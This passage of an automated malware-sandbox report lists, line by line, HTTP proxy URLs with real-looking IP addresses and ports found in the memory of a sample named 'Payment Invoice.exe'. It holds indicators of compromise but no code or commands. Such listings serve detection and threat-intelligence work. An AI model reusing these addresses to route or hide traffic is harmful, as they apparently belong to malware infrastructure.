                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.188.93.171:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.71.247.130:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.71.247.130:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://69.160.223.225:8181
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://69.160.223.225:8181://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://69.167.169.46:12903
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://69.167.169.46:12903://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://69.61.200.104:36181
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://69.61.200.104:36181://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016317AE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://69.63.73.234:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://69.63.73.234:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://69.75.140.1
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://69.75.140.157:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://69.75.140.157:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://70.126.33.226:47370
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://70.126.33.226:47370://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://70.166.167.55:57745
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://70.166.167.55:57745://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.000001631871B000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.1
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.170:26887
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.170:26887://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.170:29585
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.170:29585://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.000001631871B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.170:31571
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631871B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.170:31571://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.170:5321
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.170:5321://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.170:5385
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.170:5385://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.171:26315
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.171:26315://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.171:5369
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.171:5369://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E17000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.000001631987D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.172:1087
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319885000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.172:1087://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.173:10677
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.173:10677://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.174:22669
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.174:22669://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.000001631865A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.9
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:17893
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:17893://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:21011
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163195FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:21011://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:23685
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:23685://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:24397
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:24397://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:29129
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:29129://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.000001631863A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:29197
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631865A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:29197://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:29517://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:29813
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:29813://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:29967
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:29967://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:3051
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:3051://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631699B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:30951
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631699B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:30951://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.92:5123
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.92:5123://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.92:5775
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.92:5775://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.93:13477
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.93:13477://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.94:4595
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.94:4595://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.1
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:10235://proxyH
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:10801
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:10801://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:11251
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:11251://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:13341
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:13341://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:13477
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316A8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:13477://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:1403
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:1403://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316A74000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:1431
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:1431://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:18067
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:18067://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:1929
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:1929://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:2675
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:2675://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:30717
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:30717://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:30911
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:30911://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:5529
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:5529://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:5931
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:5931://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:5935
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:5935://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.167.221.
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.167.221.157:64742
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.167.221.157:64742://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316854000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.167.222.113:48892
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316854000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.167.222.113:48892://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.167.38.7:15410
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.167.38.7:15410://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.167.38.7:19802
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.167.38.7:19802://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.169.67.61:87
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.169.67.61:87://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.195.114.169:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.195.114.169:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.195.34.35:27360
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.195.34.35:27360://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631871B000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.00000163186F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.195.34.41:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631871B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.195.34.41:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.195.34.42:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.195.34.42:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.195.34.58:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.195.34.58:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.195.34.59:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.195.34.59:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.195.34.60:27391
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.195.34.60:27391://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.206.181.105:64935
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.206.181.105:64935://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.206.181.97:64943
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.206.181.97:64943://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.210.221.197:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.210.221.197:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163184F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.210.221.223:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163184F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.210.221.223:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.210.252.137:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.210.252.137:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.252.4.49:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.252.4.49:4145://proxyp
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.37.217.3:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.37.217.3:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.49.49.11:31034
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.49.49.11:31034://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://74.118.80.244:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317212000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://74.118.80.244:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://74.119.147.209:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://74.119.147.209:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://74.62.179.122:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://74.62.179.122:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.119.145.
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.119.145.154:28633://proxyH
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016316D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.119.145.169:38023
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.119.145.169:38023://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.119.145.169:61344
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.119.145.169:61344://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.119.145.169:61553
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.119.145.169:61553://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.233.5.68:55443
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.233.5.68:55443://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.242.24.241:8089
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.242.24.241:8089://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.37.155.85:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.37.155.85:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.48.23.181:38817
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.48.23.181:38817://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.48.23.181:38817xDm
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.48.244.78
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.48.244.78://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.48.244.78:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.77.64.116:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.77.64.116:3128://proxyx
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.142.234.
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.142.234.35:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.142.234.35:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317342000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.188.81.57:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.188.81.57:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.30.128.10:8080
